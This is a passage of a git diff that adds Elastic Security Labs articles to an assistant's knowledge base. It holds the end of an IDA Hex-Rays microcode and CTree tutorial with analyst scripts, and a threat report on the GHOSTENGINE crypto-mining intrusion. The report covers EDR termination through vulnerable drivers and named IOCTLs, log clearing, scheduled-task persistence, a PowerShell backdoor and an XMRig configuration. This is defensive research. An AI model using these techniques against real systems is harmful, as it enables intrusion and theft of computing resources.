+	    mcases_t *c;        // mop_c   cases
+	    fnumber_t *fpc;     // mop_fn  floating point constant
+	    mop_pair_t *pair;   // mop_p   operand pair
+	    scif_t *scif;       // mop_sc  scattered operand info
+	  };
+	#...
+}
+
+/// Instruction operand types
+typedef uint8 mopt_t;
+const mopt_t
+  mop_z   = 0,  ///< none
+  mop_r   = 1,  ///< register (they exist until MMAT_LVARS)
+  mop_n   = 2,  ///< immediate number constant
+  mop_str = 3,  ///< immediate string constant (user representation)
+  #...
+```
+
+The microcode generation progresses through various maturity levels, also referred to as optimization levels. The initial level, `MMAT_GENERATED`, involves the direct translation of assembly code into microcode. The final optimization level before generating the CTree is `MMAT_LVARS`.
+
+```C
+enum mba_maturity_t
+{
+  MMAT_ZERO,         ///< microcode does not exist
+  MMAT_GENERATED,    ///< generated microcode
+  MMAT_PREOPTIMIZED, ///< preoptimized pass is complete
+  MMAT_LOCOPT,       ///< local optimization of each basic block is complete.
+                     ///< control flow graph is ready too.
+  MMAT_CALLS,        ///< detected call arguments
+  MMAT_GLBOPT1,      ///< performed the first pass of global optimization
+  MMAT_GLBOPT2,      ///< most global optimization passes are done
+  MMAT_GLBOPT3,      ///< completed all global optimization. microcode is fixed now.
+  MMAT_LVARS,        ///< allocated local variables
+};
+```
+
+### Microcode traversal example
+
+The following Python code is used as an example of how to traverse and print the microcode instructions of a function, it traverses the microcode generated at the first maturity level (`MMAT_GENERATED`).
+
+```Python
+import idaapi
+import ida_hexrays
+import ida_lines
+
+
+MCODE = sorted([(getattr(ida_hexrays, x), x) for x in filter(lambda y: y.startswith('m_'), dir(ida_hexrays))])
+
+def get_mcode_name(mcode):
+    """
+    Return the name of the given mcode_t.
+    """
+    for value, name in MCODE:
+        if mcode == value:
+            return name
+    return None
+
+
+def parse_mop_t(mop):
+    if mop.t != ida_hexrays.mop_z:
+        return ida_lines.tag_remove(mop._print())
+    return ''
+
+
+def parse_minsn_t(minsn):
+    opcode = get_mcode_name(minsn.opcode)
+    ea = minsn.ea
+    
+    text = hex(ea) + " " + opcode
+    for mop in [minsn.l, minsn.r, minsn.d]:
+        text += ' ' + parse_mop_t(mop)
+    print(text)
+    
+    
+def parse_mblock_t(mblock):
+    minsn = mblock.head
+    while minsn and minsn != mblock.tail:
+        parse_minsn_t(minsn)
+        minsn = minsn.next
+    
+
+def parse_mba_t(mba):
+    for i in range(0, mba.qty):
+        mblock_n = mba.get_mblock(i)
+        parse_mblock_t(mblock_n)
+
+
+def main():
+    func = idaapi.get_func(here()) # Gets the function at the current cursor
+    maturity = ida_hexrays.MMAT_GENERATED
+    mbr = ida_hexrays.mba_ranges_t(func)
+    hf = ida_hexrays.hexrays_failure_t()
+    ida_hexrays.mark_cfunc_dirty(func.start_ea)
+    mba = ida_hexrays.gen_microcode(mbr, hf, None, ida_hexrays.DECOMP_NO_WAIT, maturity)
+    parse_mba_t(mba)
+
+
+if __name__ == '__main__':
+    main()
+```
+
+The script's output is presented below: on the left, the printed microcode in the console, and on the right, the assembly code by IDA:
+
+![Microcode traversal script’s output, assembly code](/assets/images/introduction-to-hexrays-decompilation-internals/image10.png)
+
+### CTree
+
+In this section, we'll dive into the core elements of Hex-Rays CTree structure, then proceed to a practical example demonstrating how to annotate a custom import table of malware that loads APIs dynamically.
+
+For a better understanding, we will be leveraging the following plugin ([hrdevhelper](https://github.com/patois/HRDevHelper)) that allows us to view the CTree nodes in IDA as a graph.
+
+![CTree graph of a function generated using hrdevhelper](/assets/images/introduction-to-hexrays-decompilation-internals/image7.png)
+
+[`citem_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcitem__t.shtml) is an abstract class that is the base for both [`cinsn_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcinsn__t.shtml) and [`cexpr_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcexpr__t.shtml), it holds common info like the address, item type and label while also featuring constants like `is_expr`, `contains_expr` that can be used to know the type of the object:
+
+```C
+struct citem_t
+{
+  ea_t ea = BADADDR;      ///< address that corresponds to the item. may be BADADDR
+  ctype_t op = cot_empty; ///< item type
+  int label_num = -1;     ///< label number. -1 means no label. items of the expression
+                          ///< types (cot_...) should not have labels at the final maturity
+                          ///< level, but at the intermediate levels any ctree item
+                          ///< may have a label. Labels must be unique. Usually
+                          ///< they correspond to the basic block numbers.
+  mutable int index = -1; ///< an index in cfunc_t::treeitems.
+                          ///< meaningful only after print_func()
+//...
+```
+
+The item type accessed with the `op` field indicates the type of the node, expression nodes are prefixed with `cot_` and the statements nodes are prefixed with `cit_`, example `cot_asg` indicates that the node is an assignment expression while `cit_if` indicates that the node is a condition (if) statement.
+
+Depending on the type of the statement node, a `cinsn_t` can have a different attribute for example if the item type is `cit_if` we can access the detail of the condition node through the `cif` field, as seen in the below snippet, `cinsn_t` is implemented using a union. Note that a [`cblock_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcblock__t.shtml) is a block statement which is a list of `cinsn_t` statements, we can find this type for example at the beginning of a function or after a conditional statement.
+
+```C
+struct cinsn_t : public citem_t
+{
+  union
+  {
+    cblock_t *cblock;   ///< details of block-statement
+    cexpr_t *cexpr;     ///< details of expression-statement
+    cif_t *cif;         ///< details of if-statement
+    cfor_t *cfor;       ///< details of for-statement
+    cwhile_t *cwhile;   ///< details of while-statement
+    cdo_t *cdo;         ///< details of do-statement
+    cswitch_t *cswitch; ///< details of switch-statement
+    creturn_t *creturn; ///< details of return-statement
+    cgoto_t *cgoto;     ///< details of goto-statement
+    casm_t *casm;       ///< details of asm-statement
+  };
+//...
+```
+
+In the example below, the condition node of type `cit_if` has two child nodes: the left one is of type `cit_block` which represents the "True" branch and the right is the condition to evaluate, which is a call to a function, a third child is missing as the condition does not have a "False" branch.
+
+The following is a graph showcasing the statement node cit_if
+
+![A graph showcasing the statement node cit_if](/assets/images/introduction-to-hexrays-decompilation-internals/image1.png)
+
+Find the associated decompilation for the above CTree:
+
+![The associated decompilation for the above CTree](/assets/images/introduction-to-hexrays-decompilation-internals/image8.png)
+
+The same logic applies to expressions nodes `cexpr_t`, depending on the node type, different attributes are available, as an example, a node of type `cot_asg` has children nodes accessible with the fields `x` and `y`.
+
+![A graph showcasing the expression node cot_asg](/assets/images/introduction-to-hexrays-decompilation-internals/image2.png)
+
+```C
+struct cexpr_t : public citem_t
+{
+  union
+  {
+    cnumber_t *n;     ///< used for \ref cot_num
+    fnumber_t *fpc;   ///< used for \ref cot_fnum
+    struct
+    {
+      union
+      {
+        var_ref_t v;  ///< used for \ref cot_var
+        ea_t obj_ea;  ///< used for \ref cot_obj
+      };
+      int refwidth;   ///< how many bytes are accessed? (-1: none)
+    };
+    struct
+    {
+      cexpr_t *x;     ///< the first operand of the expression
+      union
+      {
+        cexpr_t *y;   ///< the second operand of the expression
+        carglist_t *a;///< argument list (used for \ref cot_call)
+        uint32 m;     ///< member offset (used for \ref cot_memptr, \ref cot_memref)
+                      ///< for unions, the member number
+      };
+      union
+      {
+        cexpr_t *z;   ///< the third operand of the expression
+        int ptrsize;  ///< memory access size (used for \ref cot_ptr, \ref cot_memptr)
+      };
+    };
+//...
+```
+
+Finally the [`cfunc_t`](https://hex-rays.com/products/decompiler/manual/sdk/structcfunc__t.shtml) structure holds information related to the decompiled function, the function address, the microcode block array, and the CTree accessed with the `entry_ea`, `mba` and `body` fields respectively.
+
+```C
+struct cfunc_t
+{
+  ea_t entry_ea;             ///< function entry address
+  mba_t *mba;                   ///< underlying microcode
+  cinsn_t body;              ///< function body, must be a block
+//...
+```
+
+### CTree traversal example
+
+The provided Python code serves as a mini recursive visitor of a CTree, note that it does not handle all node types, the last section will describe how to use the Hex-Rays built-in visitor class [`ctree_visitor_t`](https://hex-rays.com/products/decompiler/manual/sdk/structctree__visitor__t.shtml). To begin, we obtain the `cfunc` of the function using `ida_hexrays.decompile` and access its CTree via the `body` field.
+
+Next, we check if the node(item) is an expression or a statement. Finally, we can parse the type through the `op` field and explore its child nodes.
+
+```Python
+import idaapi
+import ida_hexrays
+
+OP_TYPE = sorted([(getattr(ida_hexrays, x), x) for x in filter(lambda y: y.startswith('cit_') or y.startswith('cot_'), dir(ida_hexrays))])
+
+
+def get_op_name(op):
+    """
+    Return the name of the given mcode_t.
+    """
+    for value, name in OP_TYPE:
+        if op == value:
+            return name
+    return None
+
+
+def explore_ctree(item):
+        print(f"item address: {hex(item.ea)}, item opname: {item.opname}, item op: {get_op_name(item.op)}")
+        if item.is_expr():
+            if item.op == ida_hexrays.cot_asg:
+                explore_ctree(item.x) # left side
+                explore_ctree(item.y) # right side
+
+            elif item.op == ida_hexrays.cot_call:
+                explore_ctree(item.x)
+                for a_item in item.a: # call parameters
+                    explore_ctree(a_item)
+
+            elif item.op == ida_hexrays.cot_memptr:
+                explore_ctree(item.x)
+        else:
+            if item.op == ida_hexrays.cit_block:
+                for i_item in item.cblock: # list of statement nodes
+                    explore_ctree(i_item)
+
+            elif item.op == ida_hexrays.cit_expr:
+                explore_ctree(item.cexpr)
+                
+            elif item.op == ida_hexrays.cit_return:
+                explore_ctree(item.creturn.expr)
+            
+
+def main():
+    cfunc = ida_hexrays.decompile(here())
+    ctree = cfunc.body
+    explore_ctree(ctree)
+
+
+if __name__ == '__main__':
+    main()
+```
+
+Displayed below is the output of the traversal script executed on the `start` function of a [BLISTER](https://www.elastic.co/security-labs/revisiting-blister-new-developments-of-the-blister-loader) [sample](https://www.virustotal.com/gui/file/c98137e064bc0cd32ed0415e19daf16ed451fe1289bc41e7251dd79326206d53):
+
+![CTree traversal script’s output, decompiled function, CTree graph](/assets/images/introduction-to-hexrays-decompilation-internals/image9.png)
+
+### Practical example: annotating the custom import table of a malware sample
+
+Now that we've gained insights into the architecture and structures of the generated CTree, let's delve into a practical application and explore how to automate the annotation of a custom import table of malware.
+
+![Annotation of a custom import table of a malware](/assets/images/introduction-to-hexrays-decompilation-internals/image4.png)
+
+Hex-Rays provides a utility class [`ctree_visitor_t`](https://hex-rays.com/products/decompiler/manual/sdk/structctree__visitor__t.shtml) that can be used to traverse and modify the CTree, two important virtual methods to know are:
+ - `visit_insn`: to visit a statement
+ - `visit_expr`: to visit an expression
+
+For this example, the same BLISTER sample is used; after locating the function that gets Windows APIs addresses by hash at address 0x7FF8CC3B0926(in the .rsrc section), adding the enumeration to the IDB and applying the enum type to its parameter, we create a class that inherits from `ctree_visitor_t`, as we are interested in expressions, we will be overriding `visit_expr` only.
+
+![CTree graph of a function at address 0x7FF8CC3B7637 generated using hrdevhelper](/assets/images/introduction-to-hexrays-decompilation-internals/image6.png)
+
+The idea is to locate a `cot_call` node(1) of the function that resolves APIs by passing the `obj_ea` address of node’s first child to the function `idc.get_name` which will return the function name.
+
+```Python
+   if expr.op == idaapi.cot_call:
+            if idc.get_name(expr.x.obj_ea) == self.func_name:
+		#...
+```
+
+Next retrieve the enum of the hash by accessing the right parameter of the call node(2), in our case parameter 3.
+
+```Python
+    carg_1 = expr.a[HASH_ENUM_INDEX]
+    api_name = ida_lines.tag_remove(carg_1.cexpr.print1(None))  # Get API name
+```
+
+The next step is to locate the variable that has been assigned the address value of the WinAPI function. To do that we first need to locate the `cot_asg` node(3), parent of the call node by using the `find_parent_of` method under `cfunc.body` of the decompiled function.
+
+```Python
+    asg_expr = self.cfunc.body.find_parent_of(expr)  # Get node parent
+```
+
+Finally, we can access the first child node(4) under the `cot_asg` node, which is of type `cot_var` and get the current variable name, the Hex-Rays API [`ida_hexrays.rename_lvar`](https://hex-rays.com/products/decompiler/manual/sdk/hexrays_8hpp.shtml#ab719cfcfa884c57284cd946ac90b3c17) is used to rename the new variable with the Windows API name taken from the enum parameter.
+
+This process can ultimately save a significant amount of time for an analyst. Instead of spending time on relabeling variables, they can direct their attention to the core functionality. An understanding of how CTrees work can contribute to the development of more effective plugins, enabling the handling of more complex obfuscations.
+
+For a complete understanding and context of the example, please find the entire code below:
+
+```Python
+import idaapi
+import ida_hexrays
+import idc
+import ida_lines
+import random
+import string
+
+HASH_ENUM_INDEX = 2
+
+
+def generate_random_string(length):
+    letters = string.ascii_letters
+    return "".join(random.choice(letters) for _ in range(length))
+
+
+class ctree_visitor(ida_hexrays.ctree_visitor_t):
+    def __init__(self, cfunc):
+        ida_hexrays.ctree_visitor_t.__init__(self, ida_hexrays.CV_FAST)
+        self.cfunc = cfunc
+        self.func_name = "sub_7FF8CC3B0926"# API resolution function name
+
+    def visit_expr(self, expr):
+        if expr.op == idaapi.cot_call:
+            if idc.get_name(expr.x.obj_ea) == self.func_name:
+                carg_1 = expr.a[HASH_ENUM_INDEX]
+                api_name = ida_lines.tag_remove(
+                    carg_1.cexpr.print1(None)
+                )  # Get API name
+                expr_parent = self.cfunc.body.find_parent_of(expr)  # Get node parent
+
+                # find asg node
+                while expr_parent.op != idaapi.cot_asg:
+                    expr_parent = self.cfunc.body.find_parent_of(expr_parent)
+
+                if expr_parent.cexpr.x.op == idaapi.cot_var:
+                    lvariable_old_name = (
+                        expr_parent.cexpr.x.v.getv().name
+                    )  # get name of variable
+                    ida_hexrays.rename_lvar(
+                        self.cfunc.entry_ea, lvariable_old_name, api_name
+                    ) # rename variable
+        return 0
+
+
+def main():
+    cfunc = idaapi.decompile(idc.here())
+    v = ctree_visitor(cfunc)
+    v.apply_to(cfunc.body, None)
+
+
+if __name__ == "__main__":
+    main()
+```
+
+## Conclusion
+
+Concluding our exploration into Hex-Rays microcode and CTree generation, we've gained practical techniques for navigating the complexities of malware obfuscation. The ability to modify Hex-Rays pseudo code allows us to cut through obfuscation like Control Flow Obfuscation, remove dead code, and many more. The Hex-Rays C++ SDK emerges as a valuable resource, offering well-documented guidance for future reference. 
+
+We hope that this guide will be helpful to fellow researchers and any avid learner, please find all the scripts in our [research repository](https://github.com/elastic/labs-releases/tree/main/tools/ida_scripts).
+
+## Resources
+
+ - [Ilfak Guilfanov's Decompiler Internals: Microcode presentation](https://i.blackhat.com/us-18/Thu-August-9/us-18-Guilfanov-Decompiler-Internals-Microcode-wp.pdf)
+ - [Hex-Rays decompiler primer](https://hex-rays.com/blog/hex-rays-decompiler-primer)
+ - [HRDevHelper](https://github.com/patois/HRDevHelper/)
+ - [lucid utility](https://github.com/gaasedelen/lucid)
+ - [Hex-Rays SDK](https://hex-rays.com/products/decompiler/manual/sdk/)
+ - [Elastic Security Labs enablement tools](https://github.com/elastic/labs-releases)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/invisible_miners_unveiling_ghostengine.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/invisible_miners_unveiling_ghostengine.md
new file mode 100644
index 0000000000000..844bc65c200c3
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/invisible_miners_unveiling_ghostengine.md
@@ -0,0 +1,339 @@
+---
+title: "Invisible miners: unveiling GHOSTENGINE’s crypto mining operations"
+slug: "invisible-miners-unveiling-ghostengine"
+date: "2024-05-22"
+description: "Elastic Security Labs has identified REF4578, an intrusion set incorporating several malicious modules and leveraging vulnerable drivers to disable known security solutions (EDRs) for crypto mining."
+author:
+  - slug: salim-bitam
+  - slug: samir-bousseaden
+  - slug: terrance-dejesus
+  - slug: andrew-pease
+image: "ghostengine.jpg"
+category:
+  - slug: attack-pattern
+tags:
+  - ref4578
+  - ghostengine
+  - xmrig
+  - crypto
+  - hiddenshovel
+---
+
+## Preamble
+
+Elastic Security Labs has identified an intrusion set incorporating several malicious modules and leveraging vulnerable drivers to disable known security solutions (EDRs) for crypto mining. Additionally, the team discovered capabilities to establish persistence, install a previously undocumented backdoor, and execute a crypto-miner. We refer to this intrusion set as REF4578 and the primary payload as GHOSTENGINE (tangental research by the team at Antiy has named parts of this intrusion set [HIDDENSHOVEL](https://www.antiy.com/response/HideShoveling.html)).
+
+## Key takeaways
+
+* Malware authors incorporated many contingency and duplication mechanisms
+* GHOSTENGINE leverages vulnerable drivers to terminate and delete known EDR agents that would likely interfere with the deployed and well-known coin miner
+* This campaign involved an uncommon amount of complexity to ensure both the installation and persistence of the XMRIG miner
+
+## Code analysis 
+
+![REF4578 execution flow](/assets/images/invisible-miners-unveiling-ghostengine/image4.png "REF4578 execution flow")
+
+On May 6, 2024, at 14:08:33 UTC,  the execution of a PE file named `Tiworker.exe` (masquerading as the legitimate Windows `TiWorker.exe` file) signified the beginning of the REF4578 intrusion. The following alerts were captured in telemetry, indicating a known vulnerable driver was deployed.
+
+![REF4578 executes Tiworker to start the infection chain](/assets/images/invisible-miners-unveiling-ghostengine/image8.png "REF4578 executes Tiworker to start the infection chain")
+
+Upon execution, this file downloads and executes a PowerShell script that orchestrates the entire execution flow of the intrusion. Analysis revealed that this binary executes a hardcoded PowerShell command line to retrieve an obfuscated script, `get.png,` which is used to download further tools, modules, and configurations from the attacker C2– as depicted in the screenshot below.
+
+![Downloading get.png](/assets/images/invisible-miners-unveiling-ghostengine/image10.png "Downloading get.png")
+
+### GHOSTENGINE
+
+GHOSTENGINE is responsible for retrieving and executing modules on the machine. It primarily uses HTTP to download files from a configured domain, with a backup IP in case domains are unavailable. Additionally, it employs FTP as a secondary protocol with embedded credentials. The following is a summary of the execution flow:
+
+![The get.png PowerShell script](/assets/images/invisible-miners-unveiling-ghostengine/image11.png "The get.png PowerShell script")
+
+This script downloads and executes `clearn.png`, a component designed to purge the system of remnants from prior infections belonging to the same family but different campaign; it removes malicious files under `C:\Program Files\Common Files\System\ado` and `C:\PROGRA~1\COMMON~1\System\ado\` and removes the following scheduled tasks by name:
+
+* `Microsoft Assist Job`
+* `System Help Center Job`
+* `SystemFlushDns`
+* `SystemFlashDnsSrv`
+
+Evidence of those scheduled task artifacts may be indicators of a prior infection.
+
+![clearn.png removing any infections from previous campaigns](/assets/images/invisible-miners-unveiling-ghostengine/image12.png "clearn.png removing any infections from previous campaigns")
+
+During execution, it attempts to disable Windows Defender and clean the following Windows event log channels: 
+
+* `Application`
+* `Security`
+* `Setup`
+* `System`
+* `Forwarded Events`
+* `Microsoft-Windows-Diagnostics-Performance`
+* `Microsoft-Windows-AppModel-Runtime/Operational`
+* `Microsoft-Windows-Winlogon/Operational`
+
+![get.png clearing Windows log channels](/assets/images/invisible-miners-unveiling-ghostengine/image13.png "get.png clearing Windows log channels")
+
+`get.png` disables Windows Defender, enables remote services, and clears the contents of:
+
+* `C:\Windows\Temp\`
+* `C:\Windows\Logs\`
+* `C:\$Recycle.Bin\`
+* `C:\windows\ZAM.krnl.trace`
+
+![get.png disabling Windows Defender and enabling remote services](/assets/images/invisible-miners-unveiling-ghostengine/image6.png "get.png disabling Windows Defender and enabling remote services")
+
+`get.png` also verifies that the `C:\` volume has at least 10 MB of free space to download files, storing them in `C:\Windows\Fonts`. If not, it will try to delete large files from the system before looking for another suitable volume with sufficient space and creating a folder under `$RECYCLE.BIN\Fonts`.
+
+To get the current DNS resolution for the C2 domain names, GHOSTENGINE uses a hardcoded list of DNS servers, `1.1.1.1` and `8.8.8.8`.
+
+Next, to establish persistence, `get.png` creates the following scheduled tasks as `SYSTEM`:
+
+* **OneDriveCloudSync** using `msdtc `to run  the malicious service DLL `C:\Windows\System32\oci.dll` every 20 minutes (described later)
+* **DefaultBrowserUpdate** to run `C:\Users\Public\run.bat,` which downloads the `get.png` script and executes it every 60 minutes
+* **OneDriveCloudBackup** to execute `C:\Windows\Fonts\smartsscreen.exe` every 40 minutes
+    
+![Scheduled tasks for persistence](/assets/images/invisible-miners-unveiling-ghostengine/image21.png "Scheduled tasks for persistence")
+
+`get.png` terminates all `curl.exe` processes and any PowerShell process with `*get.png*` in its command line, excluding the current process. This is a way to terminate any concurrently running instance of the malware.
+
+This script then downloads  `config.txt`, a JSON file containing the hashes of the PE files it retrieved. This file verifies whether any updated binaries are to be downloaded by checking the hashes of the previously downloaded files from any past infections.
+
+![config.txt file used to check for updated binaries](/assets/images/invisible-miners-unveiling-ghostengine/image9.png "config.txt file used to check for updated binaries")
+
+Finally,` get.png` downloads all of its modules and various PE files. Below is a table containing a description of each downloaded file:
+
+| path                                           | Type              | Description                                                                                                                                |
+|------------------------------------------------|-------------------|--------------------------------------------------------------------------------------------------------------------------------------------|
+| `C:\Windows\System32\drivers\aswArPots.sys`      | Kernel driver     | Vulnerable driver from Avast                                                                                                               |
+| `C:\Windows\System32\drivers\IObitUnlockers.sys` | Kernel driver     | Vulnerable driver from IObit                                                                                                               |
+| `C:\Windows\Fonts\curl.exe`                      | PE executable     | Used to download files via cURL                                                                                                            |
+| `C:\Windows\Fonts\smartsscreen.exe`              | PE executable     | Core payload (GHOSTENGINE), its main purpose is to deactivate security instrumentation, complete initial infection, and execute the miner. |
+| `C:\Windows\System32\oci.dll`                    | Service DLL       | Persistence/updates module                                                                                                                 |
+| `backup.png`                                     | Powershell script | Backdoor module                                                                                                                            |
+| `kill.png`                                       | Powershell script | A PowerShell script that injects and executes a PE file responsible for killing security sensors                                           |
+
+### GHOSTENGINE modules
+
+GHOSTENGINE deploys several modules that can tamper with security tools, create a backdoor, and check for software updates.
+
+#### EDR agent controller and miner module: smartsscreen.exe
+
+This module primarily terminates any active EDR agent processes before downloading and installing a crypto-miner.
+
+![smartscreen.exe GHOSTENGINE module](/assets/images/invisible-miners-unveiling-ghostengine/image20.png "smartscreen.exe GHOSTENGINE module")
+
+The malware scans and compares all the running processes with a hardcoded list of known EDR agents. If there are any matches, it first terminates the security agent by leveraging the Avast Anti-Rootkit Driver file `aswArPots.sys` with the IOCTL `0x7299C004` to terminate the process by PID.
+
+`smartscreen.exe` is then used to delete the security agent binary with another vulnerable driver, `iobitunlockers.sys` from IObit, with the IOCTL `0x222124`.
+
+`smartscreen.exe` then downloads the XMRig client mining program (`WinRing0x64.png`) from the C2 server as `taskhostw.png`. Finally, it executes XMRig, its drivers, and the configuration file `config.json`, starting the mining process.
+
+![smartscreen.exe executing XMRig](/assets/images/invisible-miners-unveiling-ghostengine/image19.png "smartscreen.exe executing XMRig")
+
+#### Update/Persistence module: oci.dll
+
+The PowerShell script creates a service DLL (`oci.dll`), a phantom DLL loaded by `msdtc`. The DLL's architecture varies depending on the machine; it can be 32-bit or 64-bit. Its primary function is to create system persistence and download any updates from the C2 servers by downloading the `get.png` script from the C2 and executing it.
+
+![oci.dll persistence/update mechanism](/assets/images/invisible-miners-unveiling-ghostengine/image3.png "oci.dll persistence/update mechanism")
+
+Every time the <code>msdtc<strong> </strong></code>service starts, it will load <code>oci.dll</code> to spawn the PowerShell one-liner that executes <code>get.png</code> : 
+
+![oci.dll downloading and executing get.png](/assets/images/invisible-miners-unveiling-ghostengine/image23.png "oci.dll downloading and executing get.png")
+
+#### EDR agent termination module: `kill.png`
+
+`kill.png` is a PowerShell script that injects shellcode into the current process, decrypting and loading a PE file into memory.
+
+![kill.png injecting shellcode](/assets/images/invisible-miners-unveiling-ghostengine/image24.png "kill.png injecting shellcode")
+
+This module is written in C++, and the authors have integrated redundancy into its operation. This redundancy is evident in the replication of the technique used in `smartsscreen.exe` to terminate and delete EDR agent binaries; it continuously scans for any new processes.
+
+![kill.png hardcoded security agent monitoring list](/assets/images/invisible-miners-unveiling-ghostengine/image7.png "kill.png hardcoded security agent monitoring list")
+
+#### Powershell backdoor module: `backup.png`
+
+The PowerShell script functions like a backdoor, enabling remote command execution on the system. It continually sends a Base64-encoded JSON object containing a unique ID, derived from the current time and the computer name while awaiting base64-encoded commands. The results of those commands are then sent back.
+
+![backup.png operating as a backdoor](/assets/images/invisible-miners-unveiling-ghostengine/image18.png "backup.png operating as a backdoor")
+
+In this example `eyJpZCI6IjE3MTU2ODYyNDA3MjYyNiIsImhvc3QiOiJhbmFseXNpcyJ9` is the Base64-encoded JSON object:
+
+![C2 Communication example of backup.png](/assets/images/invisible-miners-unveiling-ghostengine/image16.png "backup.png HTTP header information")
+
+```
+$ echo "eyJpZCI6IjE3MTU2ODYyNDA3MjYyNiIsImhvc3QiOiJhbmFseXNpcyJ9" | base64 -D
+{"id":"171568624072626","host":"analysis"}
+```
+
+## Miner configuration
+
+XMRig is a legitimate crypto miner, and they have documented the configuration file usage and elements [here](https://xmrig.com/docs/miner/config). As noted at the beginning of this publication, the ultimate goal of the REF4578 intrusion set was to gain access to an environment and deploy a persistent Monero crypto miner, XMRig.
+
+We extracted the configuration file from the miner, which was tremendously valuable as it allowed us to report on the Monero Payment ID and track the worker and pool statistics, mined cryptocurrency, transaction IDs, and withdrawals.
+
+Below is an excerpt from the REF4578 XMRig configuration file:
+
+```
+{
+    "autosave": false,
+    "background": true,
+    "colors": true,
+
+...truncated...
+
+    "donate-level": 0,
+    "donate-over-proxy": 0,
+    "pools": [
+        {
+            "algo": "rx/0",
+            "coin": "monero",
+            "url": "pool.supportxmr[.]com:443",
+            "user": "468ED2Qcchk4shLbD8bhbC3qz2GFXqjAUWPY3VGbmSM2jfJw8JpSDDXP5xpkMAHG98FHLmgvSM6ZfUqa9gvArUWP59tEd3f",
+            "keepalive": true,
+            "tls": true
+
+...truncated...
+
+    "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36",
+    "verbose": 0,
+    "watch": true,
+    "pause-on-battery": false,
+    "pause-on-active": false
+}
+```
+
+### Monero Payment ID
+
+Monero is a blockchain cryptocurrency focusing on obfuscation and fungibility to ensure anonymity and privacy. The [Payment ID](https://www.getmonero.org/resources/moneropedia/paymentid.html) is an arbitrary and optional transaction attachment that consists of 32 bytes (64 hexadecimal characters) or 8 bytes (in the case of integrated addresses).
+
+Using the Payment ID from the above configuration excerpt (`468ED2Qcchk4shLbD8bhbC3qz2GFXqjAUWPY3VGbmSM2jfJw8JpSDDXP5xpkMAHG98FHLmgvSM6ZfUqa9gvArUWP59tEd3f`) we can view the worker and pool statistics on one of the [Monero Mining Pool site](https://monero.hashvault.pro/en/)s listed in the configuration. 
+
+![Worker and pool statistics of the REF4578 Payment ID](/assets/images/invisible-miners-unveiling-ghostengine/image22.png "Worker and pool statistics of the REF4578 Payment ID")
+
+Additionally, we can see the transaction hashes, which we can look up on the Monero blockchain explorer. Note that while transactions date back four months ago, this only indicates the _potential_ monetary gain by this specific worker and account.
+
+![Payments for the REF4578 Payment ID](/assets/images/invisible-miners-unveiling-ghostengine/image2.png "Payments for the REF4578 Payment ID")
+
+Using the Blockchain Explorer and one of the [transaction hashes](https://monero.hashvault.pro/explorer/prove/7c106041de7cc4c86cb9412a43cb7fc0a6ad2c76cfdb0e03a8ef98dd9e744442/468ED2Qcchk4shLbD8bhbC3qz2GFXqjAUWPY3VGbmSM2jfJw8JpSDDXP5xpkMAHG98FHLmgvSM6ZfUqa9gvArUWP59tEd3f/f1415e7710323cf769ce74d57ec9b7337d7a61b9ee4bba2ee38f9e8c3c067a005a484f8b9a14fb8964f56bb76181eafdb7dbb00677a155b067204423f23ab50ad146867795f560ad9443520f073f0bd71b8afd3259b24ae2a59aa7772f68fc028388f001bfeaa0f4ccc1f547b54924bb116352e9302424d731dc580dcccbb40749503640895d31559d7fc258b616576e7f052bbdbbc7083126f595c36015de02f6e95da8cfc81ee5fa1bd4d4c29bf55db96e4779924ab0d26993f7bf834ceb01fe314fd19e55c7304f91e809be3e29b68778f0da6dbcfe57d3eafc6dae5e090645d6b3753f44c4e1c1356b19d406c6efe7a55ec7c2b4997bd1fc65f15a4fda03619fc53beff111ddd9fd94f5ba3c503ccb73f52009bd3c1d47216b9a7c82d5065ac5e8a946e998cbc23fd8815a93cbbd655961709ac3ea8b1fd87e940e72370dc542ca4c22837e91ab5dd94d2c1c0a81e8ec9558766575ba236c3ae29b0f470fe881e22a03da405118a3353a5ecc618d1837e1a2bd449888a47a761efa98c407ce857fd389cdea63e9670edcf4b4d6c4c33e9c2851430270c8ef6dfb8cfeb9025ca7a17c9acdbfeb6670b3eabcbfde36cbc907e23fdd0c64aa2fc4103412a70c97838e177184c2f3d794e089b47ce66656d6c4cab2bbb4d6d71a3245f1dc360c7da9220eec90ef6e67cb13831b52ef14cf5bf1dd6adc202edc0892d9529145047786ed1042857f6986ed608839d595f06c1971f415f967d260d17ea8f5582400) we got from the Payment ID, we can see the public key, the amount is withdrawn, and when. Note that these public keys are used with one-time addresses, or stealth addresses that the adversary would then use a private key with to unlock the funds.
+
+![Transactions for the REF4578 Payment ID](/assets/images/invisible-miners-unveiling-ghostengine/image17.png "Transactions for the REF4578 Payment ID")
+
+In the above example for transaction `7c106041de7cc4c86cb9412a43cb7fc0a6ad2c76cfdb0e03a8ef98dd9e744442` we can see that there was a withdrawal of `0.109900000000` XMR (the abbreviation for Monero) totaling $14.86 USD. The Monerao Mining Pool site shows four transactions of approximately the same amount of XMR, totaling approximately $60.70 USD (January - March 2024).
+
+As of the publication of this research, there are still active miners connected to the REF4578 Payment ID.
+
+![Miners actively connecting to the REF4578 Payment ID](/assets/images/invisible-miners-unveiling-ghostengine/image5.png "Miners actively connecting to the REF4578 Payment ID")
+
+While this specific Payment ID does not appear to be a big earner, it is evident that REF4578 could operate this intrusion set successfully. Other victims of this campaign could have different Payment IDs used to track intrusions, which could be combined for a larger overall haul.
+
+## Malware and MITRE ATT&CK
+
+Elastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that threats use against enterprise networks.
+
+### Tactics
+
+Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+* [Execution](https://attack.mitre.org/tactics/TA0002/)
+* [Persistence](https://attack.mitre.org/tactics/TA0003)
+* [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)
+* [Discovery](https://attack.mitre.org/tactics/TA0007)
+* [Command and Control](https://attack.mitre.org/tactics/TA0011)
+* [Exfiltration](https://attack.mitre.org/tactics/TA0010/)
